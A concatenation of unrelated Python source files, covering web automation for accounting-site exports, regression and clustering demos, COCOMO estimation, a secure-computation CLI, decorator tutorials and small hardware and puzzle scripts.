pool.close_browser(browser)
export_tasks(login_info, ztList, site, callback_ip, queue='export_out_kungeek')
# 开始任务
# signature('export_out_kungeek', args=(login_info, ztList, site, callback_ip), app=celery_app).apply_async(queue='export_in')
res['id'] = str(id)
res['msg'] = 'ok'
res['zt'] = [item['name'].strip() for item in ztData]
else:
res['msg'] = msg
elif site == '17DZ':
browser = pool.get_browser('chrome', 'yiqidai')
msg = try_to_login(browser,login_info,'17DZ')
if msg == '登陆成功':
from yiqidai.NewViews import GetInfo
dz = GetInfo(browser)
ztData = dz.getAllzt()
pool.close_browser(browser)
export_tasks(login_info, ztList, site, callback_ip,queue='export_out_yiqidai')
# 开始任务
# signature('export_out_yiqidai', args=(login_info, ztList, site, callback_ip), app=celery_app).apply_async(queue='export_in')
res['msg'] = 'ok'
res['zt'] = [item['customerFullName'].strip() for item in ztData]
else:
res['msg'] = msg
elif site == 'yunzhangfang':
browser = pool.get_browser('chrome', 'yunzhangfang')
msg = try_to_login(browser,login_info,'YZF')
if msg == '登陆成功':
from yunzhangfang.NewViews import GetInfo
yzf = GetInfo(browser)
ztData = yzf.getAllzt()
pool.close_browser(browser)
export_tasks(login_info, ztList, site, callback_ip, queue='export_out_yunzhangfang')
# 开始任务
# signature('export_out_yunzhangfang', args=(login_info, ztList, site, callback_ip),app=celery_app).apply_async(queue='export_in')
res['msg'] = 'ok'
res['zt'] = [item['qymc'].strip() for item in ztData]
else:
res['msg'] = msg
elif site == 'datawisee':
browser = pool.get_browser('chrome', 'datawisee')
msg = try_to_login(browser,login_info,'QMX')
if msg == '登陆成功':
from yunzhangfang.NewViews import GetInfo
yzf = GetInfo(browser)
ztData = yzf.getAllzt()
pool.close_browser(browser)
export_tasks(login_info, ztList, site, callback_ip, queue='export_out_datawisee')
# 开始任务
# signature('export_out_datawisee', args=(login_info, ztList, site, callback_ip), app=celery_app).apply_async(queue='export_in')
res['msg'] = 'ok'
res['zt'] = [item['qymc'].strip() for item in ztData]
else:
res['msg'] = msg
return jsonify(res)
def try_to_login(browser,login_info,zdhm):
getInfo = None
if zdhm == 'HSZ':
from huisuanzhang.NewViews import GetInfo
getInfo = GetInfo(browser)
elif zdhm == '17DZ':
from yiqidai.NewViews import GetInfo
getInfo = GetInfo(browser)
elif zdhm == 'YZF':
from yunzhangfang.NewViews import GetInfo
getInfo = GetInfo(browser)
# 登陆
i = 1
while True:
msg = getInfo.login(login_info)
if msg == '登陆成功':
return msg
elif msg == '登录失败':
i += 1
continue
elif msg == '账号和密码不匹配,请重新输入':
return msg
elif msg == '账号已停用或合同未审核通过':
return msg
elif msg == '账号不存在或已停用':
return msg
elif i > 4:
return '验证码错误%s次,需要人工介入' % i
elif msg == '验证码错误,请重新输入':
i += 1
continue
if __name__ == '__main__':
# app.run(host='0.0.0.0',debug=True,processes=4)
app.run(host='0.0.0.0',port=5500,debug=False,threaded=False)
# 设置threaded为True,开启的多线程是指不同路由使用多线程来处理请求,不是指单个路由多线程处理请求
|
993,415 | 3431a60513173f82f3ece16302cc8a42fd080d0e | from statistics import mean
import numpy as np
import matplotlib.pyplot as plt
xs = np.array([1,2,3,4,5,6], dtype = np.float64)
ys = np.array([5,4,6,5,6,7], dtype = np.float64)
# xs=np.array([12,13,14,15,16,17,18,19,20,21,22,23])
# ys=np.array([202031,208153,188749,165747,150677,142722,136637,143456,135291,118952,103986,93421])
def linear_regression_line(xs,ys):
m = (((mean(xs)*mean(ys)) - mean(xs*ys)) /
(mean(xs)**2 - mean(xs**2)))
c = mean(ys) - m*mean(xs)
return m,c
m,c = linear_regression_line(xs,ys)
reg_line = [m*x+c for x in xs]
def square_error(y_orig, y_reg):
return sum((y_orig-y_reg)**2)
def confidance(y_orig, y_reg):
y_mean_line = [mean(y_orig) for y in y_orig]
square_error_regression = square_error(y_orig,y_reg)
square_error_y_mean = square_error(y_orig,y_mean_line)
return 1 - (square_error_regression/square_error_y_mean)
confi_r = confidance(ys,reg_line)
print(confi_r)
plt.scatter(xs,ys)
plt.plot(xs,reg_line)
plt.show()
|
993,416 | 8fc07007d86e86a6b7baa5350ca7c39ad8820089 | from __future__ import division,print_function
import sys
sys.dont_write_bytecode = True
from lib import *
import numpy as np
_ = 0
Coc2tunings = {
# vl l nom h vh xh
# Scale Factors
'Flex' : [5.07, 4.05, 3.04, 2.03, 1.01, _],
'Pmat' : [7.80, 6.24, 4.68, 3.12, 1.56, _],
'Prec' : [6.20, 4.96, 3.72, 2.48, 1.24, _],
'Resl' : [7.07, 5.65, 4.24, 2.83, 1.41, _],
'Team' : [5.48, 4.38, 3.29, 2.19, 1.01, _],
# Effort Multipliers
'acap' : [1.42, 1.19, 1.00, 0.85, 0.71, _],
'aexp' : [1.22, 1.10, 1.00, 0.88, 0.81, _],
'cplx' : [0.73, 0.87, 1.00, 1.17, 1.34, 1.74],
'data' : [ _, 0.90, 1.00, 1.14, 1.28, _],
'docu' : [0.81, 0.91, 1.00, 1.11, 1.23, _],
'ltex' : [1.20, 1.09, 1.00, 0.91, 0.84, _],
'pcap' : [1.34, 1.15, 1.00, 0.88, 0.76, _],
'pcon' : [1.29, 1.12, 1.00, 0.90, 0.81, _],
'plex' : [1.19, 1.09, 1.00, 0.91, 0.85, _],
'pvol' : [ _, 0.87, 1.00, 1.15, 1.30, _],
'rely' : [0.82, 0.92, 1.00, 1.10, 1.26, _],
'ruse' : [ _, 0.95, 1.00, 1.07, 1.15, 1.24],
'sced' : [1.43, 1.14, 1.00, 1.00, 1.00, _],
'site' : [1.22, 1.09, 1.00, 0.93, 0.86, 0.80],
'stor' : [ _, _, 1.00, 1.05, 1.17, 1.46],
'time' : [ _, _, 1.00, 1.11, 1.29, 1.63],
'tool' : [1.17, 1.09, 1.00, 0.90, 0.78, _]
}
def cocomo2(dataset, project,
a=2.94, b=0.91,
tunes=Coc2tunings,
decisions=None,
noise = None):
if decisions is None: decisions = dataset.decisions
sfs = 0 # Scale Factors
ems = 1 # Effort Multipliers
kloc = 22
scaleFactors = 5
effortMultipliers = 17
# for i in range(scaleFactors):
# sfs += tunes[dataset.indep[i]][project[i]-1]
# for i in range(effortMultipliers):
# j = i + scaleFactors
# ems *= tunes[dataset.indep[j]][project[j]-1]
for decision in decisions:
if decision < scaleFactors:
sfs += tunes[dataset.indep[decision]][project[decision]-1]
elif decision < kloc:
ems *= tunes[dataset.indep[decision]][project[decision]-1]
elif decision == kloc:
continue
else:
raise RuntimeError("Invalid decisions : %d"%decision)
if noise is None:
kloc_val = project[kloc]
else:
r = random.random()
kloc_val = project[kloc] * (abs(1 - noise) + (2*noise*r))
return a * ems * kloc_val ** (b + 0.01*sfs)
def coconut(dataset,
training, # list of projects
a=10, b=1,# initial (a,b) guess
deltaA=10,# range of "a" guesses
deltaB=0.5,# range of "b" guesses
depth=10, # max recursive calls
constricting=0.66, # next time,guess less
decisions=None,
noise=None):
if depth > 0:
useful,a1,b1= guesses(dataset,training,a,b,deltaA,deltaB, decisions=decisions, noise=noise)
if useful: # only continue if something useful
return coconut(dataset, training,
a1, b1, # our new next guess
deltaA * constricting,
deltaB * constricting,
depth - 1)
return a,b
def guesses(dataset, training, a,b, deltaA, deltaB,
repeats=20, decisions=None, noise=None): # number of guesses
useful, a1,b1,least,n = False, a,b, 10**32, 0
while n < repeats:
n += 1
aGuess = a - deltaA + 2 * deltaA * rand()
bGuess = b - deltaB + 2 * deltaB * rand()
error = assess(dataset, training, aGuess, bGuess, decisions=decisions, noise=noise)
if error < least: # found a new best guess
useful,a1,b1,least = True,aGuess,bGuess,error
return useful,a1,b1
def assess(dataset, training, aGuess, bGuess, decisions=None, noise=None):
error = 0.0
for project in training: # find error on training
predicted = cocomo2(dataset, project.cells, aGuess, bGuess, decisions=decisions, noise=noise)
actual = effort(dataset, project)
error += abs(predicted - actual) / actual
return error / len(training) # mean training error
## Reduced COCOMO
def prune_cocomo(model, rows, row_count, column_ratio):
pruned_rows = shuffle(rows[:])[:row_count]
loc_column, rest = model.decisions[-1], model.decisions[:-1]
entropies = []
for decision in rest:
effort_map = get_column_vals(model, pruned_rows, decision)
entropy = 0
for key, efforts in effort_map.items():
variance = np.asscalar(np.var(efforts))
n = len(efforts)
entropy += n*variance/len(pruned_rows)
entropies.append((entropy, decision))
entropies = sorted(entropies)[:int(round(column_ratio*len(rest)))]
columns = sorted([entropy[1] for entropy in entropies] + [loc_column])
return pruned_rows, columns
def get_column_vals(model, rows, col_index):
effort_map = {}
for row in rows:
val = row.cells[col_index]
val_efforts = effort_map.get(val, [])
val_efforts.append(effort(model, row))
effort_map[val] = val_efforts
return effort_map
def shuffle(lst):
if not lst: return []
random.shuffle(lst)
return lst
|
993,417 | 4f00364b83b301418a280b7883755f92d3891825 | import argparse
import socket
import topohiding
from topohiding.helperfunctions import FakeHPKCR, HPKCR, find_generator
import struct
import base64
import os
import time
# Test Commands:
# python3.6 cli.py -k 5 -v 1 -p 60002 -b 2 -i foo1 -n 127.0.0.1:60001
# python3.6 cli.py -k 5 -v 1 -p 60001 -b 2 -i foo0 -n 127.0.0.1:60002
#
def receive_exact(s, n):
res = s.recv(n)
while(len(res)<n):
res+= s.recv(n-len(res))
return res
def receive_string(s):
size = receive_exact(s, 4)
size = struct.unpack("I", size)[0]
res = receive_exact(s,size).decode("utf-8")
return res
def transmit_string(s, str_tx):
tx_string = str_tx.encode('utf-8')
size = struct.pack("I", len(tx_string))
s.send(size+tx_string)
start_time = time.time()
#parse list of neighbors in IP:Port form, argument for OR opperation
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--nodes', nargs='*', action='append', type=str, required=True)
parser.add_argument('-i', '--id', type=str, required=False, default=base64.b64encode(os.urandom(16)).decode('utf-8'))
parser.add_argument('-b', '--bound', type=int, required=True) #upper bound on total number of neighbors
parser.add_argument('-p', '--port', type=int, required=True)
parser.add_argument('-v', '--value', type=int, required=True)
parser.add_argument('-k', '--kappa', type=int, required=True)
parser.add_argument('-t', '--timer', action='store_true', default=False)
args = parser.parse_args()
node_hostnames = []
node_ports = []
node_addr = []
node_connections = []
for node_info in args.nodes[0]:
hostname,port = node_info.split(':')
node_hostnames.append(hostname)
node_ports.append(int(port))
print(node_hostnames)
print(node_ports)
print(args.nodes)
print(len(args.nodes[0]))
#rx socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(('0.0.0.0', args.port))
serversocket.listen(len(args.nodes[0]))
print("Value: "+ str(args.value))
input("Waiting for other clients to come online. Press any key to continue.")
#create tx sockets
tx_sockets_tmp=[]
rx_sockets={}
tx_sockets={}
for index in range(len(args.nodes[0])):
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsocket.connect((node_hostnames[index], node_ports[index]))
transmit_string(clientsocket, args.id)
tx_sockets_tmp.append(clientsocket)
#accept rx sockets and reply to name
for index in range(len(args.nodes[0])):
connection, address = serversocket.accept()
client_name = receive_string(connection)
transmit_string(connection, args.id)
rx_sockets[client_name] = connection
#check for replies and restablish tx_socket / name mapping
for tx_socket in tx_sockets_tmp:
client_name = receive_string(tx_socket)
tx_sockets[client_name] = tx_socket
node_names = list(rx_sockets.keys())
#init topohiding class
q = 1559
g = 2597
#g = find_generator(q)
hpkcr = HPKCR(g, q)
topo = topohiding.TopoHiding(hpkcr, args.kappa, args.bound, len(args.nodes[0]), args.value)
#do first round
tx_messages = topo.do_round(0, None)
rx_messages = ['']*len(tx_messages)
print(node_names)
for round_number in range(1, 2 * topo.n_rounds + 1):
print(round_number)
#send message to tx_sockets
for index in range(len(node_names)):
print(tx_messages[index])
transmit_string(tx_sockets[node_names[index]], tx_messages[index])
#receive message from rx_sockets
for index in range(len(node_names)):
rx_messages[index] = receive_string(rx_sockets[node_names[index]])
#compute next round
tx_messages = topo.do_round(round_number, rx_messages)
print("FINAL ANSWER:", tx_messages)
if(args.timer):
print("--- %s seconds ---" % (time.time() - start_time))
|
993,418 | 2e03b82406df019e27998f4c4c3f61ac65f0e151 | # grabs 3 dictionaries containing shopping lists and merges them into one shopping list
# original dictionaries, modified to have 'apples' in 2 dictionaries
# to test an additional case (duplicate values)
roommate1Shopping = {'fruit': 'apples', 'meat': 'chicken', 'vegetables': 'potatoes', 'drinks': ['beer','wine','vodka'],\
'dessert': 'ice cream'}
roommate2Shopping = {'fruit': 'lemons', 'meat': 'hamburger', 'drinks': ['apple juice', 'orange juice', 'vodka']}
roommate3Shopping = {'fruit': ['apples','oranges', 'bananas'], 'vegetables': ['lettuce', 'carrots'], 'drinks': 'milk'}
rs1 = {'fruit': 'apples', 'meat': 'chicken', 'vegetables': 'potatoes', 'drinks': ['beer','wine','vodka'],\
'dessert': 'ice cream'}
rs2 = {'fruit': 'lemons', 'meat': 'hamburger', 'drinks': ['apple juice', 'orange juice', 'vodka']}
rs3 = {'fruit': ['apples','oranges', 'bananas'], 'vegetables': ['lettuce', 'carrots'], 'drinks': 'milk'}
# create a list of shopping lists
inputLists = [roommate1Shopping, roommate2Shopping, roommate3Shopping]
inputLists2 = [rs1, rs2, rs3]
# for each list,
# turn all values that are not lists into lists
# ie 'fruit': 'apples' ==> 'fruit': ['apples']
for l in inputLists:
for key in l:
if type(l[key]) != list:
l[key] = [l[key]]
mergedList = {} # new list to merge the individual lists
for l in inputLists: # loop thru the individual lists
for k in l: # loop thru keys in list
# if the key is already in the merged list,
# extent (a list method) the value
if (k in mergedList) == True:
mergedList[k].extend(l[k])
# if the key not in the merged list
# add the key-value
else:
mergedList[k] = l[k]
print('===== MERGED LIST:')
print(mergedList)
### SECOND VERSION WITHOUT CONVERTING TO LISTS
#for l in inputLists2: # loop thru the individual lists
# print(l)
mergedList2 = {} # new list to merge the individual lists
for l in inputLists2: # loop thru the individual lists
for k in l: # loop thru keys in list
# if the key is already in the merged list,
if (k in mergedList2) == True:
# if value for k in input list is a list
# and value for k in merged list is a list
if type(l[k]) == list and type(mergedList2[k]) == list:
mergedList2[k].extend(l[k])
# print('a',mergedList2[k])
# if value for k in input list is a list
# and value for k in merged list is not a list
elif type(l[k]) == list and type(mergedList2[k]) != list:
# print('l[k] =', l[k])
# print('mergedList2[k] = ', mergedList2[k])
mergedList2[k] = [mergedList2[k]]
mergedList2[k].extend(l[k])
# print('b',mergedList2[k])
# if value for k in input list is not a list
# and value for k in merged list is a list
elif type(l[k]) != list and type(mergedList2[k]) == list:
l[k] = [l[k]]
mergedList2[k].extend(l[k])
# print('c',mergedList2[k])
# if value for k in input list is not a list
# and value for k in merged list is not a list
elif type(l[k]) != list and type(mergedList2[k]) != list:
mergedList2[k] = [mergedList2[k], l[k]]
# print('d',mergedList2[k])
# if the key not in the merged list
# does not matter if the value is a list or not
else:
mergedList2[k] = l[k]
print('===== MERGED LIST:')
print(mergedList2)
|
993,419 | 5c4bb7b95d715d25a952f98aef84f02393e71468 | import cv2
import numpy as np
def main():
# 이미지 원본
img_src = "C:/Users/wsChoe/customDataset/labelImg/data/original_img/1.jpg"
img_source = cv2.imread(img_src)
# 이미지 축소
img_result = cv2.resize(img_source, None, fx=0.15, fy=0.15, interpolation = cv2.INTER_AREA)
cv2.imshow("x0.5 INTER_AREA", img_result)
cv2.waitKey(0)
# 이미지 대칭
dst2 = cv2.flip(img_result, 0) # x축 대칭
dst3 = cv2.flip(img_result,-1) # xy축 대칭
dst4 = cv2.flip(img_result,1) # y축 대칭
cv2.imshow("src", img_result)
cv2.imshow("dst2", dst2)
cv2.imshow("dst3", dst3)
cv2.imshow("dst4", dst4)
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == "__main__":
main() |
993,420 | 91f40e99627fb98a48f727dc30aa2b1e287d820c | import argparse
import numpy as np
from pathlib import Path
import matplotlib.pyplot as plt
from test_mask import test_topk
def run_experiment(data_path, masking_features):
"""
Compares concrete dropout to randomly picking k features.
"""
random_roc = []
dropout_roc = []
k_values = [5, 10, 15, 20, 25, 30, 37]
for k in k_values:
random_roc.append(test_topk(data_path, k, masking_features, random_k=True))
dropout_roc.append(test_topk(data_path, k, masking_features, random_k=False))
# save the arrays
mask_folder = 'with_masking' if masking_features else 'without_masking'
np.save(data_path/mask_folder/'random_roc.npy', random_roc)
np.save(data_path/mask_folder/'dropout_roc.npy', dropout_roc)
# plot the roc curve, and save that too
fig, ax = plt.subplots(figsize=(10, 10))
ax.plot(k_values, random_roc, label='Random')
ax.plot(k_values, dropout_roc, label='Dropout FR')
ax.set_xlabel('Number of features')
ax.set_ylabel('Test AUROC')
ax.legend()
plt.savefig(data_path/mask_folder/'Result.png', bbox_inches='tight', transparent=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data-path', default=None)
parser.add_argument('--masking-features', action='store_true')
args = parser.parse_args()
if args.data_path:
run_experiment(Path(args.data_path), args.masking_features)
else:
run_experiment(Path('data'), args.masking_features)
|
993,421 | a6884076ce65f766d69dceab0b187ff48b7d193d | # 装饰器的本质就是闭包
# 装饰器的作用,在不修改原函数的前提下,实现函数功能的拓展。
def login(index): #传入被装饰的函数
def foo():
usernamae ='python'
password = '123'
u = input('请输入用户名')
p = input('请输入密码')
if usernamae== u and password == p:
index() #执行传入进来的被装饰函数
else:
print("用户名或密码错误")
return foo
#@login -->语法糖
# 等同于 index = login(index) ,将被装饰的函数传入login函数,然后返回了foo 函数,并赋值给名字相同的index。
# 同时index函数被存在login.__closure__属性中。
# 当执行index()时,便执行了foo()
@login
def index():
print('欢迎来到首页')
# index()
# index=login(index)
# print(index.__closure__)
# index()
#带参数的装饰器
def login2(buy): #传入被装饰的函数
def foo2(*avgs,**kwargs):
usernamae ='python'
password = '123'
u = input('请输入用户名')
p = input('请输入密码')
if usernamae== u and password == p:
buy(*avgs,**kwargs) #使用了foo2传入的参数
else:
print("用户名或密码错误")
return foo2
@login2
def buy(name):
print('购买了{}商品'.format(name))
# buy('张三')
#装饰类
def login3(Myclass): #传入被装饰的函数
def foo2(*avgs,**kwargs):
usernamae ='python'
password = '123'
u = input('请输入用户名')
p = input('请输入密码')
if usernamae== u and password == p:
return Myclass(*avgs,**kwargs) #z装饰类没有返回值,所以这里要加个return
else:
print("用户名或密码错误")
return foo2
@login3
class Myclass:
def __init__(self,n,m):
self.n = n
self.m = m
def add(self):
return (self.n+self.m)
my = Myclass(3,4)
print(my.add())
|
993,422 | 292c761f620fef0db5b9d86a31b0054ae6576365 | class Solution:
def canJump(self, nums: List[int]) -> bool:
n, pos = len(nums), 0
for i in range(n):
if i <= pos:
pos = max(pos, i + nums[i])
if pos >= n - 1:
return True
return False |
993,423 | ab8ab86d54edac6ea03ac9737b6754f16a55b32c | import networkx as nx
import numpy as np
import re
def make_graph(lines):
lines = [line[:-1] for line in lines]
g = nx.DiGraph()
for line in lines:
source,targets = line.split(' contain ')
source = source.replace(' bags','')
if 'no other bags' not in targets:
for starget in targets.split(', '):
w = int(starget[0])
target = re.search('([a-z]+ [a-z]+)',starget).group(1)
g.add_edge(source,target,weight=w)
return g
def get_parents_of(graph,node):
return len(nx.ancestors(graph,node))
def get_bags_in(graph,node):
countbags = []
descendants = list(nx.descendants(graph,node))
allpaths = list(nx.all_simple_paths(graph.subgraph(descendants+[node]),source=node,target=descendants))
for path in allpaths:
countbags.append(np.prod([graph[path[i]][path[i+1]]['weight'] for i in range(len(path)-1)]))
return sum(countbags)
with open('inputs/day7/input.txt','r') as rf:
lines = rf.readlines()
graph = make_graph(lines)
print("Challenge 1: {}".format(get_parents_of(graph,'shiny gold')))
print("Challenge 2: {}".format(get_bags_in(graph,'shiny gold')))
|
993,424 | 911f458f1e66c83abadb684ae919737697191097 | """
"""
from django.conf.urls import include, url
import ckeditor
import rec_file
urlpatterns = [
url(r'^ckeditor_upload_image/?$',ckeditor.upload_image),
url(r'^upload/?$',rec_file.general)
]
|
993,425 | 6c1278d0fcadc4b3c8cfde312b136c0b1f15716f | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 1 12:54:31 2018
@author: ajay yadav
"""
import random # for gentrating random things may be random letter or number
import string # for genrating the string
vowels ='aeiou' # for vowels
consonants = 'bcdfghjklmnpqrstvwxy' # for consonants
letter = string.ascii_lowercase # to apply lowercase letters
list1 = ['v','c', 'l'] # list containg the valid items to be selected for particular word
# for taking the choice for random word to genrate
letter_input_1 = input("Select your choice. Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
while(letter_input_1 not in list1): # conditions for taking only valid input
letter_input_1 =input("Please fill the valid choice, Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
letter_input_2 = input("Select your choice. Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
while(letter_input_2 not in list1):
letter_input_2 =input("Please fill the valid choice, Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
letter_input_3 = input("Select your choice. Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
while(letter_input_3 not in list1):
letter_input_3 =input("Please fill the valid choice, Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
letter_input_4 = input("Select your choice. Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
while(letter_input_4 not in list1):
letter_input_4 =input("Please fill the valid choice, Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
letter_input_5 = input("Select your choice. Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
while(letter_input_5 not in list1):
letter_input_5 =input("Please fill the valid choice, Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
letter_input_6 = input("Select your choice. Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
while(letter_input_6 not in list1):
letter_input_6 =input("Please fill the valid choice, Enter 'v' for vowels, 'c' for consonants, 'l' for any letter: ")
# to print the choice of letter you have entered
print(letter_input_1+letter_input_2+letter_input_3+letter_input_4+letter_input_5+letter_input_6)
def genrate(): # function which genrate random letter
if letter_input_1 == 'v' :
letter1 = random.choice(vowels)
elif letter_input_1 == 'c' :
letter1 = random.choice(consonants)
else :
letter1 = random.choice(letter)
if letter_input_2 == 'v' :
letter2 = random.choice(vowels)
elif letter_input_2 == 'c' :
letter2 = random.choice(consonants)
else :
letter2 = random.choice(letter)
if letter_input_3 == 'v' :
letter3 = random.choice(vowels)
elif letter_input_3 == 'c' :
letter3 = random.choice(consonants)
else :
letter3 = random.choice(letter)
if letter_input_4 == 'v' :
letter4 = random.choice(vowels)
elif letter_input_4 == 'c' :
letter4 = random.choice(consonants)
else :
letter4 = random.choice(letter)
if letter_input_5 == 'v' :
letter5 = random.choice(vowels)
elif letter_input_5 == 'c' :
letter5 = random.choice(consonants)
else :
letter5 = random.choice(letter)
if letter_input_6 == 'v' :
letter6 = random.choice(vowels)
elif letter_input_6 == 'c' :
letter6 = random.choice(consonants)
else :
letter6 = random.choice(letter)
# formation of words after taking value from conditon and genrator
word = letter1 +letter2 +letter3 +letter4 +letter5 +letter6
return word
# for printing value more than one time
no_of_words_to_be_genrated = input("Enter the no. of words you want to genrate:")
for i in range(int(no_of_words_to_be_genrated)):
print(genrate())
|
993,426 | 4e1fdb37bf9a19d239beface68e20dedee205f35 | """
Решение системы
x^2+y^2=1
y=tan(x)
"""
"""
Графически локализуем корни
Получаем
x_1 = [0.6 , 0.7]
y_1 = [0.7, 0.8]
Искать будем только один корень в этом интервале, так как в виду специфики
уравнений, если (x*, y*) является корнем, то (-x*,-y*) также является корнем
"""
"""
Выберем следующее выражение
x= arctan(y) = p_1
y = sqrt(1-x^2) = p_2
Так как частная производная p_1 по х равна нулю, а по у равна 1/(1+y^2), то
номра матрицы будет меньше единицы, а значит метод простой итерации будет сходиться
"""
"""
Оценка числа необходимых итераций, k>=log_q(1-q)*eps
При q = 2/3 и eps = 1e-6
"""
import numpy as np
def get_next_point(x,y):
return np.arctan(y), np.sqrt(1-x**2)
x= 0.6
y=0.7
xes =[]
yes = []
xes.append(x)
yes.append(y)
for _ in range(35):
x,y = get_next_point(x,y)
xes.append(x)
yes.append(y)
# plt.scatter(xes,yes)
# plt.show()
print("Проверка полученного значения")
print(x**2+y**2-1)
print(y - np.tan(x))
print("~~~~~~~~~~~~~~~~~~")
print("Ответ,",[x,y], [-x,-y])
|
993,427 | ed9be598d20ad7ef324962bbb1f547204008808c | import requests
res = requests.get('https://torina.top')
print(res.txt) |
993,428 | 1afe5509342ddb50639daebb9efe5f535f54d042 | import elasticsearch
from elasticsearch import helpers
import collections
class ElasticService:
@staticmethod
def create_index_with_data(data, index: str, request_body: dict):
es = elasticsearch.Elasticsearch()
# Ignore 404 error when index doesn't exist.
es.indices.delete(index=index, ignore=404)
# Ignore 400 error caused by IndexAlreadyExistsException when creating an index
es.indices.create(index=index, body=request_body, ignore=400)
# Bulk add documents
collections.deque(helpers.parallel_bulk(client=es, actions=data, index=index))
# Refresh Index
es.indices.refresh()
|
993,429 | 63b7eb90392f121e0f85962e3a5c0175c93ea9da | import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
# 数据归一化预处理
class StandardScaler:
def __init__(self):
self.mean_ = None
self.scaler_ = None
def fit(self, X):
"""根据传进来的训练数据集X,获取数据的均值以及方差"""
assert X.ndim == 2
self.mean_ = np.array([np.mean(X[:, i]) for i in range(X.shape[1])])
self.scaler_ = np.array([np.std(X[:, i]) for i in range(X.shape[1])])
return self
def transform(self, X):
"""将X进行均值方差归一化"""
assert X.ndim == 2
assert self.mean_ is not None and self.scaler_ is not None
assert X.shape[1] == len(self.mean_)
resX = np.empty(X.shape, dtype=float)
for col in range(X.shape[1]):
resX[:, col] = (X[:, col] - self.mean_[col]) / self.scaler_[col]
return resX
iris = load_iris()
X = iris.data
Y = iris.target
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=666)
standardScaler = StandardScaler()
standardScaler.fit(X_train)
X_test_standard = standardScaler.transform(X_test)
print(X_test_standard)
|
993,430 | c171c893e0b55a163a52d4689a07ca66fe7471b9 | l_num_alpha=["ZERO","ONE","TWO","THREE","FOUR","FIVE","SIX","SEVEN","EIGHT","NINE"]
l_num_int =[0,1,2,3,4,5,6,7,8,9]
while 1==1 :
num_alpha=str(input("영문 숫자명을 입력하시요 ")).upper()
if num_alpha.upper() == 'Q':
print("프로그램을 종료합니다. 안녕~^^ ")
break
else:
for i in range(len(l_num_alpha)):
if l_num_alpha[i]==num_alpha:
print(l_num_int[i])
break
elif l_num_alpha[i]!=num_alpha and i<len(l_num_alpha)-1:
continue
elif i==len(l_num_alpha)-1:
print("모르는 숫자입니다.")
|
993,431 | 36b4f1df4632d1a19145e8d46a603d81ccd2c884 | # Raspberry Pi Pico - I2C LCD
# Datei: buch-rpi-pico-kap6-i2c-lcd.py
# Bibliothek
from machine import I2C, Pin
from lcd_api import LcdApi
from pico_i2c_lcd import I2cLcd
import utime
# Variablen/Objekte
I2C_ADDR = 0x3F
I2C_NUM_ROWS = 2
I2C_NUM_COLS = 16
sda=machine.Pin(8)
scl=machine.Pin(9)
i2c = I2C(0, sda=sda, scl=scl, freq=400000)
lcd = I2cLcd(i2c, I2C_ADDR, I2C_NUM_ROWS, I2C_NUM_COLS)
# Hauptprogramm
while True:
lcd.clear()
lcd.backlight_on()
lcd.move_to(1,0)
lcd.putstr("1: Raspberry Pi")
lcd.move_to(2,1)
lcd.putstr("2: Pico")
utime.sleep(2) |
993,432 | 48230167eab0fc5f43cae9b6ac5bad38ed650a80 | import numpy as np
from sklearn.base import BaseEstimator, ClusterMixin
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn.utils import check_random_state
from sklearn import metrics
import os, glob
from sklearn.decomposition import TruncatedSVD
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import Normalizer
from time import time
import numpy as np
prev = np.zeros(7095)
class KernelKMeans(BaseEstimator, ClusterMixin):
"""
Kernel K-means
Reference
---------
Kernel k-means, Spectral Clustering and Normalized Cuts.
Inderjit S. Dhillon, Yuqiang Guan, Brian Kulis.
KDD 2004.
"""
def __init__(self, n_clusters=3, max_iter=50, tol=1e-3, random_state=None,
kernel="polynomial", gamma=.0097, degree=2, coef0=3,
kernel_params=None, verbose=0):
self.n_clusters = n_clusters
self.max_iter = max_iter
self.tol = tol
self.random_state = random_state
self.kernel = kernel
self.gamma = gamma
self.degree = degree
self.coef0 = coef0
self.kernel_params = kernel_params
self.verbose = verbose
@property
def _pairwise(self):
return self.kernel == "precomputed"
def _get_kernel(self, X, Y=None):
if callable(self.kernel):
params = self.kernel_params or {}
else:
params = {"gamma": self.gamma,
"degree": self.degree,
"coef0": self.coef0}
return pairwise_kernels(X, Y, metric=self.kernel,
filter_params=True, **params)
def fit(self, X, y=None, sample_weight=None):
'''computes the model by calculating centroids for each cluster'''
n_samples = X.shape[0]
K = self._get_kernel(X)
sw = sample_weight if sample_weight else np.ones(n_samples)
self.sample_weight_ = sw
rs = check_random_state(self.random_state)
self.labels_ = rs.randint(self.n_clusters, size=n_samples)
dist = np.zeros((n_samples, self.n_clusters))
self.within_distances_ = np.zeros(self.n_clusters)
for it in xrange(self.max_iter):
dist.fill(0)
self._compute_dist(K, dist, self.within_distances_, update_within=True)
labels_old = self.labels_
self.labels_ = dist.argmin(axis=1)
# Compute the number of samples whose cluster did not change
# since last iteration.
n_same = np.sum((self.labels_ - labels_old) == 0)
if 1 - float(n_same) / n_samples < self.tol:
if self.verbose:
print "Converged at iteration", it + 1
break
self.X_fit_ = X
prev = self.labels_
return self
def _compute_dist(self, K, dist, within_distances, update_within):
"""Compute a n_samples x n_clusters distance matrix using the
kernel trick."""
sw = self.sample_weight_
for j in xrange(self.n_clusters):
